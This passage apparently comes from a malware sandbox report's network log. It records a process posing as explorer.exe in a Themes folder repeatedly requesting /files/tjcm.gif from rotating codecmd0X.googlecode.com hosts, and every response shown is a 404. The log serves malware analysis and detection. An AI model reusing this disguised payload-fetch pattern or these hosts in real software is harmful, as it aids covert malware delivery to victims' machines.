                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:32 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:32.443142891 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.549717108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:34.005450010 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:34.725075006 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:34 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:34.725716114 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.54971874.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:36.185051918 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:36.916802883 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:36 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:36.916821003 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.549719108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:38.573492050 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:39.301351070 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:39 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:39.301443100 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.549720108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:41.707295895 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:42.421715021 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:42 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:42.421757936 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.54972174.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:43.698071003 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:44.404170036 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:44 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:44.404200077 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.549722108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:46.364754915 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:47.074553013 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:46 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:47.074651003 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.549723108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:48.323319912 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:49.033297062 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:48 GMT
